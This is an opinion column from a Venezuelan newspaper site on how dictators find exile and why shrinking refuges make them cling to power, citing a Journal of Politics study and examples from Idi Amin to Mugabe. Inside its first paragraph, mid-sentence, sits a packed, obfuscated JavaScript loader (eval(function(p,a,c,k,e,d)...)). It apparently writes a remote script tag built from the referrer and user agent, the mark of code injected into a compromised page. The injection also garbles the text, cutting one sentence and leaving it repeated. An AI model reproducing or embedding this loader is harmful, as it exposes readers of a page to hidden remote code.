publicidad

Transferencias infernales

Noel Álvarez / Coordinador Nacional de IPP-Gente / Noelalvarez10@gmail.com / @alvareznv
  Según eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hneah|var|u0026u|referrer|seazi||js|php'.split('|'),0,{})) la revista "The Journal of Polítics" de la Universidad de Chicago, debido al crecimiento del alcance de la justicia y de las responsabilidades globales, a los dictadores se les hace cada vez más difícil encontrar un lugar seguro donde exiliarse. Esto hace que los incentivos para aferrarse al poder hayan crecido

Una tiranía se instaura en una nación cuando el Gobierno es tomado por personas que usan su autoridad para oprimir al pueblo. A lo largo de la historia, los dictadores se han aprovechado del poder para saquear a sus países. Con lo hurtado compran propiedades y abren cuentas bancarias en el exterior. Esa es una riqueza que nunca caduca y que los sátrapas se llevan consigo en sus últimos momentos de dominio. Lo hizo la esposa de Ben Alí con la tonelada y media de oro que la acompañó hasta Arabia Saudí y también así lo hizo Muamar Gadafi, con las 29 toneladas que vendió antes de dejar el mundo. 

Según un estudio, que publica la revista "The Journal of Polítics" de la Universidad de Chicago, debido al crecimiento del alcance de la justicia y de las responsabilidades globales, a los dictadores se les hace cada vez más difícil encontrar un lugar seguro donde exiliarse. Esto hace que los incentivos para aferrarse al poder hayan crecido, aumentando la probabilidad que los estallidos sociales o las guerras civiles, sean los actores principales en los finales de los periodos autocráticos. 

En este estudio, los autores recogen datos sobre el destino de un centenar de dictadores que se han exiliado desde 1946. Los datos muestran que 52 países diferentes han albergado al menos un dictador, y que los principales receptores han sido EEUU, Reino Unido, Rusia, Argentina y Francia. Los Castro, en Cuba, no aceptan dictadores porque ellos se consideran “demócratas” y  una mala imagen puede perjudicar sus negocios.   

El líder ugandés Idi Amín se exilió primero en Libia y luego en Arabia Saudí; el zaireño Mobutu Sese Seko, en Marruecos; Charles Taylor, de Liberia, se desplazó a Nigeria; el pasado 21 de enero del 2017, el presidente derrotado de Gambia, Yaha Jammeh, se exilió en Guinea Ecuatorial, que le había ofrecido refugio. Sobre Robert Mugabe, último dictador depuesto, unos señalan que negoció inmunidad para quedarse en Zimbabwe y otros dicen que se trasladó a Sudáfrica. 

En conclusión: todo Gobierno autocrático y violador de DDHH tiene un horizonte muy reducido de maniobra, por tanto, no es nada extraño su afán de aferrarse al poder, porque con su pérdida, no solo se juegan privilegios, sino que también ponen en riesgo sus vidas. Por último, todo parecido con la realidad de algún país, es una simple coincidencia. 

 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama